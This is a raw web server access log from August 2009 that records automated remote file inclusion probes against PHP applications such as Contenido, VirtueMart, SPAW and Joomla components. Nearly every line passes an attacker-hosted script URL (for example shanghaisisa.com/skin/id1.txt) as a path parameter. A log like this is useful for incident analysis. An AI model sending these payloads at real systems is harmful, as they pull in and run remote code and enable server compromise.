211.110.19.24 - - [02/Aug/2009:04:53:10 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:10 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:10 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:18 -0400] "GET /logs/access_log.Q109071700%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:43 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:45 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:45 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:03 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:10 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:10 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:11 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:19 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:19 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:20 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:29 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:32 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:32 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:32 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:37 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:37 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:38 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:47 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:47 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:47 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:54:58 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:04 -0400] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 12004 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:04 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:05 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:12 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:12 -0400] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 12004 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:12 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:14 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:20 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:24 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:04:55:27 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:04:55:27 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:04:55:27 -0400] "GET /logs/access_log.Q109062000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:55:29 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
211.110.19.24 - - [02/Aug/2009:04:55:33 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:36 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:36 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:37 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:41 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:43 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:43 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:43 -0400] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 12004 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:55:55 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:56:03 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:56:06 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:56:06 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:56:07 -0400] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 12004 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:56:08 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:56:08 -0400] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 12004 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:56:08 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:56:15 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:56:19 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:04:57:08 -0400] "GET /logs/access_log.Q109062000%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:57:11 -0400] "GET /logs/access_log.Q109070700/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:57:29 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:57:37 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:04:57:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.171.225.234 - - [02/Aug/2009:04:58:15 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:58:22 -0400] "GET /logs/access_log.Q109060500//phpsecurityadmin/include/logout.php?PSA_PATH=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:58:22 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:58:22 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:58:22 -0400] "GET /logs/error_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
211.110.19.24 - - [02/Aug/2009:04:59:03 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:59:28 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:59:28 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:59:28 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:59:48 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:59:48 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:59:48 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:59:53 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:59:53 -0400] "GET /?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:59:53 -0400] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 12004 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:05:00:03 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:05:00:03 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:05:00:03 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:05:00:13 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:05:00:14 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:05:00:14 -0400] "GET /logs/access_log.Q109070700/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:05:00:19 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:05:00:19 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:05:00:23 -0400] "GET /logs/access_log.Q109052600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:05:00:23 -0400] "GET /logs/access_log.Q109062400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:05:00:25 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:05:00:33 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:05:00:49 -0400] "GET /logs/access_log.Q109070200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
208.80.195.33 - - [02/Aug/2009:05:00:49 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; IEMB3; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; IEMB3)"
63.147.72.145 - - [02/Aug/2009:05:00:50 -0400] "GET /main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:00:50 -0400] "GET /logs/main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:00:50 -0400] "GET /logs/access_log.Q109051700/main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:05:00:55 -0400] "GET /logs/error_log.Q109051600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
216.120.237.150 - - [02/Aug/2009:05:00:55 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [02/Aug/2009:05:00:55 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [02/Aug/2009:05:00:55 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
63.147.72.145 - - [02/Aug/2009:05:01:01 -0400] "GET /main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:01:01 -0400] "GET /logs/main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:01:01 -0400] "GET /logs/access_log.Q109051700/main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:01:03 -0400] "GET /main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:01:03 -0400] "GET /logs/main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:01:03 -0400] "GET /logs/access_log.Q109051700%20%20/main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:05:01:07 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:05:01:07 -0400] "GET /logs/access_log.Q109062700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:05:01:07 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:05:01:10 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
63.147.72.145 - - [02/Aug/2009:05:01:12 -0400] "GET /logs/access_log.Q109060900/main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.111.62.19 - - [02/Aug/2009:05:01:28 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
63.147.72.145 - - [02/Aug/2009:05:01:28 -0400] "GET /logs/access_log.Q109060900%20%20/main.php?x=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.111.62.19 - - [02/Aug/2009:05:01:29 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.111.62.19 - - [02/Aug/2009:05:01:29 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:05:01:40 -0400] "GET /logs/error_log.Q109062400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
216.120.237.150 - - [02/Aug/2009:05:02:03 -0400] "GET /logs/access_log.Q109071100//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
213.171.225.234 - - [02/Aug/2009:05:02:13 -0400] "GET /logs/error_log.Q109060800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:05:02:42 -0400] "GET /logs/error_log.Q109060700/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Aug/2009:05:02:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.128.135.52 - - [02/Aug/2009:05:02:48 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [02/Aug/2009:05:02:48 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [02/Aug/2009:05:02:48 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:05:02:55 -0400] "GET /logs/access_log.Q109051400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
